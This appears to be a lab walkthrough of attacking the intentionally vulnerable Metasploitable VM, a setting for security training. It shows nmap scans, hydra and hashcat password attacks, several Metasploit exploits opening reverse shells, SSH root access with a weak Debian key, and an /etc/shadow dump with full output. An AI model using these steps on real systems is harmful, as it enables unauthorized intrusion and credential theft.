Metasploitable

Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image with a number of vulnerable packages included, which can be run on most virtualization software.
You can grab your copy at Vulnhub – Metasploitable
I used Kali Linux for attacking and VirtualBox for virtualization.

Information Gathering

nmap is a great tool for scanning ports and finding network services on a machine.
We will run nmap with the following options:
-sV to probe open ports for service and version info
-O to fingerprint and try to guess the operating system
-p1-65535 to do a complete port scan

root@kali:~# nmap -sV -O 192.168.0.14 -p1-65535
Starting Nmap 6.47 ( http://nmap.org ) at 2015-06-12 16:46 MDT
Nmap scan report for 192.168.0.14
Host is up (0.00073s latency).
Not shown: 65522 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 08:00:27:EE:93:3E (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Host: metasploitable.localdomain; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.34 seconds

Attacking Passwords and Cracking Hashes

First, we try to attack weak passwords and crack any password hashes we have found before trying to locate or exploit a vulnerability on the machine. In this section I have gathered the usernames, passwords and hashes beforehand in order to better demonstrate the use of the following tools.

SSH Bruteforce

hydra is a great tool for bruteforcing network services. Although it is tedious to bruteforce SSH, it is still important to have the know how.
We will run hydra with the -C option to pass a colon separated file containing usernames and passwords

root@kali:~# hydra -C metasploitableuserpass.txt 192.168.0.14 ssh
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2015-06-12 17:10:04
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 6 tasks per 1 server, overall 64 tasks, 6 login tries, ~0 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.0.14 login: msfadmin password: msfadmin
[22][ssh] host: 192.168.0.14 login: postgres password: postgres
[22][ssh] host: 192.168.0.14 login: service password: service
[22][ssh] host: 192.168.0.14 login: klog password: 123456789
[22][ssh] host: 192.168.0.14 login: user password: user
[22][ssh] host: 192.168.0.14 login: sys password: batman
1 of 1 target successfully completed, 6 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-06-12 17:10:04

Telnet Bruteforce

We can use hydra once again to bruteforce the telnet service running on the system. We once again use the -C option.

root@kali:~# hydra -C metasploitableuserpass.txt 192.168.0.14 telnet
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2015-06-12 20:27:15
[WARNING] telnet is by its nature unreliable to analyze, if possible better choose FTP, SSH, etc. if available
[DATA] max 6 tasks per 1 server, overall 64 tasks, 6 login tries, ~0 tries per task
[DATA] attacking service telnet on port 23
[23][telnet] host: 192.168.0.14 login: user password: user
[23][telnet] host: 192.168.0.14 login: sys password: batman
[23][telnet] host: 192.168.0.14 login: klog password: 123456789
[23][telnet] host: 192.168.0.14 login: postgres password: postgres
[23][telnet] host: 192.168.0.14 login: msfadmin password: msfadmin
[23][telnet] host: 192.168.0.14 login: service password: service
1 of 1 target successfully completed, 6 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-06-12 20:27:20

Cracking Hashes

From the bruteforced SSH accounts, we can find the password hashes for accounts on the system by using reading the contents of the /etc/shadow file and proceed to crack the hashes using hashcat
We use the -m option to specify the type of hash being passed and also add a wordlist of possible passwords to reduce the time required to crack the hash.

root@kali:~# hashcat -m 500 metasploitablehash.txt metasploitablepass.txt
Initializing hashcat v0.49 with 1 threads and 32mb segment-size...
Added hashes from file /root/metasploitablehash.txt: 7 (7 salts)
NOTE: press enter for status-screen
$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:batman
$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:123456789
$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:msfadmin
$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:user
$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:postgres
$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:service
Input.Mode: Dict (/root/metasploitablepass.txt)
Index.....: 1/1 (segment), 6 (words), 48 (bytes)
Recovered.: 6/7 hashes, 6/7 salts
Speed/sec.: - plains, - words
Progress..: 6/6 (100.00%)
Running...: --:--:--:--
Estimated.: --:--:--:--
Started: Fri Jun 12 17:01:19 2015
Stopped: Fri Jun 12 17:01:19 2015

Exploitation and Privilege Escalation

Samba

The version of Samba running on the box is vulnerable to Samba “username map script” Command Execution and can be exploited using the Metasploit module.

msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
 Name Current Setting Required Description
 ---- --------------- -------- -----------
 RHOST 192.168.0.14 yes The target address
 RPORT 139 yes The target port
Payload options (cmd/unix/reverse):
 Name Current Setting Required Description
 ---- --------------- -------- -----------
 LHOST 192.168.0.13 yes The listen address
 LPORT 4444 yes The listen port
Exploit target:
 Id Name
 -- ----
 0 Automatic
msf exploit(usermap_script) > run
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo zvN93GNFfTvnAR16;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "zvN93GNFfTvnAR16\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 4 opened (192.168.0.13:4444 -> 192.168.0.14:43221) at 2015-06-12 17:26:04 -0600
id
uid=0(root) gid=0(root)

This version of samba is also vulnerable to Samba Symlink Directory Traversal due to the presence of a writable share on the system which can be identified using the enum4linux tool.

root@kali:~# enum4linux 192.168.0.14
WARNING: ldapsearch is not in your path. Check that package is installed and your PATH is sane.
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Jun 14 17:17:02 2015
 ==========================
| Target Information |
 ==========================
Target ........... 192.168.0.14
...
[+] Attempting to map shares on 192.168.0.14
//192.168.0.14/print$ Mapping: DENIED, Listing: N/A
//192.168.0.14/tmp Mapping: OK, Listing: OK
//192.168.0.14/opt Mapping: DENIED, Listing: N/A
...

We can see that the tmp share is writable and leverage this to exploit the directory traversal vulnerability.

msf > use auxiliary/admin/smb/samba_symlink_traversal
msf auxiliary(samba_symlink_traversal) > show options
Module options (auxiliary/admin/smb/samba_symlink_traversal):
 Name Current Setting Required Description
 ---- --------------- -------- -----------
 RHOST 192.168.0.14 yes The target address
 RPORT 445 yes Set the SMB service port
 SMBSHARE tmp yes The name of a writeable share on the server
 SMBTARGET rootfs yes The name of the directory that should point to the root filesystem
msf auxiliary(samba_symlink_traversal) > run
[*] Connecting to the server...
[*] Trying to mount writeable share 'tmp'...
[*] Trying to link 'rootfs' to the root filesystem...
[*] Now access the following share to browse the root filesystem:
[*] \\192.168.0.14\tmp\rootfs\
[*] Auxiliary module execution completed

We can now use the smbclient command to browse the disk and gather authorized SSH keys for the system or even add our own keys as authorized SSH keys.

root@kali:~# smbclient //192.168.0.14/tmp
Enter root's password:
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
smb: \> cd rootfs\/root/.ssh/
smb: \rootfs\root\.ssh\> get authorized_keys
getting file \rootfs\root\.ssh\authorized_keys of size 405 as authorized_keys (197.7 KiloBytes/sec) (average 197.8 KiloBytes/sec)
smb: \rootfs\root\.ssh\> ^C
root@kali:~# cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable

We can use this information to exploit the Debian OpenSSH Predictable PRNG exploit illustrated further on in this post.

distcc

The distcc program has a daemon running as a network service which is vulnerable to DistCC Daemon Command Execution and can be exploited using the Metasploit module.

msf > use exploit/unix/misc/distcc_exec
msf exploit(distcc_exec) > show options
Module options (exploit/unix/misc/distcc_exec):
 Name Current Setting Required Description
 ---- --------------- -------- -----------
 RHOST 192.168.0.14 yes The target address
 RPORT 3632 yes The target port
Payload options (cmd/unix/reverse):
 Name Current Setting Required Description
 ---- --------------- -------- -----------
 LHOST 192.168.0.13 yes The listen address
 LPORT 4444 yes The listen port
Exploit target:
 Id Name
 -- ----
 0 Automatic Target
msf exploit(distcc_exec) > run
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo jjkbNNf5ZM9T9S8f;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "jjkbNNf5ZM9T9S8f\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 5 opened (192.168.0.13:4444 -> 192.168.0.14:41599) at 2015-06-12 17:30:07 -0600
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)

Apache Tomcat

The Apache Tomcat service uses the default credentials tomcat/tomcat which allows us to deploy arbitrary JSP applications and gain a shell on the machine.
We can exploit this using the module Apache Tomcat Manager Application Deployer Authenticated Code Execution or Apache Tomcat Manager Authenticated Upload Code Execution. The only difference between the modules is that the former uses a PUT request to upload the payload whereas the the latter uses a POST request to the /manager/html/upload application of Tomcat to upload the payload.

msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > show options
Module options (exploit/multi/http/tomcat_mgr_deploy):
 Name Current Setting Required Description
 ---- --------------- -------- -----------
 PASSWORD tomcat no The password for the specified username
 PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used)
 Proxies no A proxy chain of format type:host:port[,type:host:port][...]
 RHOST 192.168.0.14 yes The target address
 RPORT 8180 yes The target port
 USERNAME tomcat no The username to authenticate as
 VHOST no HTTP server virtual host
Payload options (java/meterpreter/reverse_tcp):
 Name Current Setting Required Description
 ---- --------------- -------- -----------
 LHOST 192.168.0.13 yes The listen address
 LPORT 4444 yes The listen port
Exploit target:
 Id Name
 -- ----
 0 Automatic
msf exploit(tomcat_mgr_deploy) > run
[*] Started reverse handler on 192.168.0.13:4444
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 6473 bytes as DW4jt5FInhZE9yysl2qFBXquq.war ...
[*] Executing /DW4jt5FInhZE9yysl2qFBXquq/4JE8SRGFoTspH3bDjPjRNHrqjdjHh.jsp...
[*] Undeploying DW4jt5FInhZE9yysl2qFBXquq ...
[*] Sending stage (30680 bytes) to 192.168.0.14
[*] Meterpreter session 7 opened (192.168.0.13:4444 -> 192.168.0.14:59015) at 2015-06-12 17:57:23 -0600
meterpreter > getuid
Server username: tomcat55

Apache httpd Webserver

The Apache webserver is not vulnerable in itself but it does host vulnerable applications. We can use dirb to crawl the webserver and locate possibly vulnerable applications.
We use the -r option with dirb to not search within directories recursively as we are only trying to locate vulnerable applications for now. In usual scans, recursive search is a great tool to locate sensitive information or otherwise hidden vulnerable applications.

root@kali:~# dirb http://192.168.0.14 /usr/share/wordlists/dirb/big.txt -r
-----------------
DIRB v2.21
By The Dark Raver
-----------------
START_TIME: Fri Jun 12 18:35:53 2015
URL_BASE: http://192.168.0.14/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt
OPTION: Not Recursive
-----------------
GENERATED WORDS: 20458
---- Scanning URL: http://192.168.0.14/ ----
+ http://192.168.0.14/cgi-bin/ (CODE:403|SIZE:328)
+ http://192.168.0.14/index (CODE:200|SIZE:45)
+ http://192.168.0.14/phpinfo (CODE:200|SIZE:47560)
+ http://192.168.0.14/server-status (CODE:403|SIZE:333)
==> DIRECTORY: http://192.168.0.14/tikiwiki/
==> DIRECTORY: http://192.168.0.14/twiki/
-----------------
DOWNLOADED: 20458 - FOUND: 4

TikiWiki

The TikiWiki web application has two vulnerabilities, TikiWiki Information Disclosure and TikiWiki tiki-graph_formula Remote PHP Code Execution.
We will exploit both these vulnerabilities using the second module mentioned above which includes the information disclosure exploit.

msf > use exploit/unix/webapp/tikiwiki_graph_formula_exec
msf exploit(tikiwiki_graph_formula_exec) > show options
Module options (exploit/unix/webapp/tikiwiki_graph_formula_exec):
 Name Current Setting Required Description
 ---- --------------- -------- -----------
 Proxies no A proxy chain of format type:host:port[,type:host:port][...]
 RHOST 192.168.0.14 yes The target address
 RPORT 80 yes The target port
 URI /tikiwiki yes TikiWiki directory path
 VHOST no HTTP server virtual host
Exploit target:
 Id Name
 -- ----
 0 Automatic
msf exploit(tikiwiki_graph_formula_exec) > run
[*] Started reverse handler on 192.168.0.13:4444
[*] Attempting to obtain database credentials...
[*] The server returned : 200 OK
[*] Server version : Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch
[*] TikiWiki database informations :
db_tiki : mysql
dbversion : 1.9
host_tiki : localhost
user_tiki : root
pass_tiki : root
dbs_tiki : tikiwiki195
[*] Attempting to execute our payload...
[*] Sending stage (40499 bytes) to 192.168.0.14
[*] Meterpreter session 8 opened (192.168.0.13:4444 -> 192.168.0.14:56372) at 2015-06-12 18:41:35 -0600
meterpreter > getuid
Server username: www-data (33)

Debian OpenSSH

The OpenSSH version running on the system is vulnerable to the Debian’s OpenSSL Library Predictable Random Number Generator exploit.
For this, we will need to acquire a list of authorized keys which we can do using an unprivileged shell by reading the /root/.ssh/authorized_keys file.

cat /root/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable

Now that we have an authorized key, we need to find out the private key paired with the authorized public key. We can get the archive of compromised key pairs provided by the folks at Offensive Security on their Github – RSA 2048.
After extracting the archive, we can locate the private key file paired with the public key and use it to SSH in as the root user.

root@kali:~/rsa/2048# grep -l AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== *.pub
57c3115d77c56390332dc5c49978627a-5429.pub
root@kali:~# ssh -i /rsa/2048/57c3115d77c56390332dc5c49978627a-5429 [email protected]
Public key 57:c3:11:5d:77:c5:63:90:33:2d:c5:c4:99:78:62:7a blacklisted (see ssh-vulnkey(1)); continuing anyway
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have mail.
root@metasploitable:~# id
uid=0(root) gid=0(root) groups=0(root)

PostgreSQL

The PostgreSQL service running on the system uses default credentials and can be exploited to gain a shell on the system using the PostgreSQL for Linux Payload Execution Metasploit module.

msf > use exploit/linux/postgres/postgres_payload
msf exploit(postgres_payload) > show options
Module options (exploit/linux/postgres/postgres_payload):
 Name Current Setting Required Description
 ---- --------------- -------- -----------
 DATABASE template1 yes The database to authenticate against
 PASSWORD postgres no The password for the specified username. Leave blank for a random password.
 RHOST 192.168.0.14 yes The target address
 RPORT 5432 yes The target port
 USERNAME postgres yes The username to authenticate as
 VERBOSE false no Enable verbose output
Payload options (generic/shell_reverse_tcp):
 Name Current Setting Required Description
 ---- --------------- -------- -----------
 LHOST 192.168.0.13 yes The listen address
 LPORT 4444 yes The listen port
Exploit target:
 Id Name
 -- ----
 0 Linux x86
msf exploit(postgres_payload) > run
[*] Started reverse handler on 192.168.0.13:4444
[*] 192.168.0.14:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
[*] Uploaded as /tmp/BpmBaUTU.so, should be cleaned up automatically
[*] Command shell session 3 opened (192.168.0.13:4444 -> 192.168.0.14:34466) at 2015-06-14 14:41:37 -0600
id
uid=108(postgres) gid=117(postgres) groups=114(ssl-cert),117(postgres)

Privilege Escalation

The Linux kernel version can be found by running uname -a on a shell on the Metasploitable box.

meterpreter > shell
Process 6071 created.
Channel 5 created.
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

This kernel version is vulnerable to Linux udev Netlink Local Privilege Escalation.
We can use the relevant metasploit module to exploit this vulnerability.

msf > use exploit/linux/local/udev_netlink
msf exploit(udev_netlink) > show options
Module options (exploit/linux/local/udev_netlink):
 Name Current Setting Required Description
 ---- --------------- -------- -----------
 NetlinkPID no Usually udevd pid-1. Meterpreter sessions will autodetect
 SESSION 8 yes The session to run this module on.
 WritableDir /tmp yes A directory where we can write files (must not be mounted noexec)
Exploit target:
 Id Name
 -- ----
 0 Linux x86
msf exploit(udev_netlink) > run
[*] Started reverse handler on 192.168.0.13:4444
[*] Attempting to autodetect netlink pid...
[*] Meterpreter session, using get_processes to find netlink pid
[*] udev pid: 2655
[+] Found netlink pid: 2654
[*] Writing payload executable (152 bytes) to /tmp/BSsWpWUGOB
[*] Writing exploit executable (1879 bytes) to /tmp/dFDoNsoNgO
[*] chmod'ing and running it...
[*] Command shell session 9 opened (192.168.0.13:4444 -> 192.168.0.14:56373) at 2015-06-12 18:45:17 -0600
id
uid=0(root) gid=0(root)

Post Exploitation

Password Hashes

As root user, we can easily grab password hashes from the machine.

root@metasploitable:~# cat /etc/shadow
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
sync:*:14684:0:99999:7:::
games:*:14684:0:99999:7:::
man:*:14684:0:99999:7:::
lp:*:14684:0:99999:7:::
mail:*:14684:0:99999:7:::
news:*:14684:0:99999:7:::
uucp:*:14684:0:99999:7:::
proxy:*:14684:0:99999:7:::
www-data:*:14684:0:99999:7:::
backup:*:14684:0:99999:7:::
list:*:14684:0:99999:7:::
irc:*:14684:0:99999:7:::
gnats:*:14684:0:99999:7:::
nobody:*:14684:0:99999:7:::
libuuid:!:14684:0:99999:7:::
dhcp:*:14684:0:99999:7:::
syslog:*:14684:0:99999:7:::
klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7:::
sshd:*:14684:0:99999:7:::
msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:14684:0:99999:7:::
bind:*:14685:0:99999:7:::
postfix:*:14685:0:99999:7:::
ftp:*:14685:0:99999:7:::
postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:14685:0:99999:7:::
mysql:!:14685:0:99999:7:::
tomcat55:*:14691:0:99999:7:::
distccd:*:14698:0:99999:7:::
user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:7:::
service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:7:::
telnetd:*:14715:0:99999:7:::
proftpd:!:14727:0:99999:7:::

MySQL Database Compromise

The MySQL database present on the system uses the default credentials of root/root and the database can be compromised to disclose sensitive data.

root@metasploitable:~# mysql -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 27
Server version: 5.0.51a-3ubuntu5 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| tikiwiki |
| tikiwiki195 |
+--------------------+
4 rows in set (0.00 sec)

PostgreSQL Database Compromise

The PostgreSQL installation on the box also uses default credentials postgres/postgres and can be compromised to disclose sensitive data. To access this database we need to switch to the postgres user with password postgres.

root@metasploitable:~# su postgres
postgres@metasploitable:/root$ psql -U postgres
Welcome to psql 8.3.1, the PostgreSQL interactive terminal.
Type: \copyright for distribution terms
 \h for help with SQL commands
 \? for help with psql commands
 \g or terminate with semicolon to execute query
 \q to quit
postgres=# \l
 List of databases
 Name | Owner | Encoding
-----------+----------+----------
 postgres | postgres | UTF8
 template0 | postgres | UTF8
 template1 | postgres | UTF8
(3 rows)

Notes

Metasploitable is a demo box which is meant to demonstrate the use of tools rather than to emulate an actual penetration test and for this reason it has absolutely zero defenses and uses a lot of vulnerable applications and default credentials. Comparatively more realistic penetration test virtual machines can be found over at VulnHub for learning and hands-on experience with computer and network security.